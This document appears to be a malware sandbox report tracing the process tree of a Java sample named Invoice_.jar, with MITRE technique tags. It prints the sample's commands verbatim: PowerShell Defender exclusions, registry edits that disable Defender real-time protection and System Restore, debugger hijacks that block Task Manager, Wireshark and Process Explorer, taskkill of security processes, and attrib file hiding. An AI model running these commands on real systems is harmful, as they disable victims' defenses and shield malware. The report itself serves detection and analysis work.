PID 512 wrote to memory of 4560	512	java.exe	359
PID 4560 wrote to memory of 5000	4560	cmd.exe	361
PID 4560 wrote to memory of 5000	4560	cmd.exe	361
PID 4560 wrote to memory of 4700	4560	cmd.exe	362
PID 4560 wrote to memory of 4700	4560	cmd.exe	362
PID 512 wrote to memory of 4240	512	java.exe	363
PID 512 wrote to memory of 4240	512	java.exe	363
PID 4240 wrote to memory of 4604	4240	cmd.exe	365
PID 4240 wrote to memory of 4604	4240	cmd.exe	365
PID 4240 wrote to memory of 4928	4240	cmd.exe	366
PID 4240 wrote to memory of 4928	4240	cmd.exe	366
PID 512 wrote to memory of 4144	512	java.exe	367
PID 512 wrote to memory of 4144	512	java.exe	367
PID 4144 wrote to memory of 2112	4144	cmd.exe	369
PID 4144 wrote to memory of 2112	4144	cmd.exe	369
PID 4144 wrote to memory of 2092	4144	cmd.exe	370
PID 4144 wrote to memory of 2092	4144	cmd.exe	370
PID 512 wrote to memory of 4620	512	java.exe	371
PID 512 wrote to memory of 4620	512	java.exe	371
PID 4620 wrote to memory of 4140	4620	cmd.exe	373
PID 4620 wrote to memory of 4140	4620	cmd.exe	373
PID 4620 wrote to memory of 3824	4620	cmd.exe	374
PID 4620 wrote to memory of 3824	4620	cmd.exe	374
PID 512 wrote to memory of 3936	512	java.exe	375
PID 512 wrote to memory of 3936	512	java.exe	375
PID 512 wrote to memory of 856	512	java.exe	377
PID 512 wrote to memory of 856	512	java.exe	377
PID 512 wrote to memory of 4496	512	java.exe	379
PID 512 wrote to memory of 4496	512	java.exe	379
PID 512 wrote to memory of 3240	512	java.exe	381
PID 512 wrote to memory of 3240	512	java.exe	381
PID 512 wrote to memory of 4804	512	java.exe	383
PID 512 wrote to memory of 4804	512	java.exe	383
PID 512 wrote to memory of 1284	512	java.exe	385
PID 512 wrote to memory of 1284	512	java.exe	385
PID 512 wrote to memory of 5084	512	java.exe	387
PID 512 wrote to memory of 5084	512	java.exe	387
PID 512 wrote to memory of 4248	512	java.exe	389
PID 512 wrote to memory of 4248	512	java.exe	389
PID 512 wrote to memory of 4356	512	java.exe	391
PID 512 wrote to memory of 4356	512	java.exe	391
PID 512 wrote to memory of 4888	512	java.exe	393
PID 512 wrote to memory of 4888	512	java.exe	393

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3948	attrib.exe
2276	attrib.exe
3864	attrib.exe
3852	attrib.exe
720	attrib.exe
3096	attrib.exe
1732	attrib.exe
1668	attrib.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\Invoice_.jar
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:512
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2876
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1456
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4028
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3372
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1284
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:1668
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:3948
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\bTTIR\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:2276
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\bTTIR\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:3864
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\bTTIR
  2⤵
  - Views/modifies file attributes
  PID:3852
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\bTTIR
  2⤵
  - Views/modifies file attributes
  PID:720
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\bTTIR
  2⤵
  - Views/modifies file attributes
  PID:3096
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\bTTIR\SOAqQ.class
  2⤵
  - Views/modifies file attributes
  PID:1732
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2488
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1260
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:2148
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\bTTIR','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\bTTIR\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3228
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1912
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1260
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  2⤵
  PID:4008
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1284
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  2⤵
  PID:1000
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  2⤵
  PID:3960
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1080
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  2⤵
  PID:3092
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3804
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:836
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:4028
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:188
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:1436
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2072
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
  2⤵
  PID:3812
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4024
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  2⤵
  PID:352
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3488
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1504
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  2⤵
  PID:1792
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:780
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3152
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3568
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:992
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:3784
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2104
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1560
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:4016
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3864
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2436
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1672
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1260
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4152
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4224
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4292
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4328
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    PID:4428
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    PID:4452
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4464
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4512
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:4568
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:4588
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4608
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:4648
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:4668
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4688
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4700
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:4772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:4796
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4824
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:4860
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:4880
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4900
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:4936
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:4956
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4980
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:5016
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:5036
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5056
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:500
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:1468
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2300
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:3636
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:200
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:836
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:3784
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:2664
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1792
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:1080
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:3804
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4260
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:4120
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:4376
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2920
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4180
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:4288
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:4364
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4412
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:3048
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4460
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:4024
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:3032
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3984
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:4264
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:4216
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    PID:4468
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:4500
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4580
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:4660
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:4548
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4616
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3280
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:4388
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:4372
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4776
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:4816
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:4692
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4764
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:4896
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:4640
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4944
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:4956
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:5028
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5052
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
    3⤵
    PID:1284
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:1468
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3996
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:4124
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:1732
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2664
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:4272
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:4200
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4132
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:4368
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:2688
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3944
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4300
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    PID:4224
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:4408
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2920
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4296
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1704
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4472
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1912
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1932
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4216
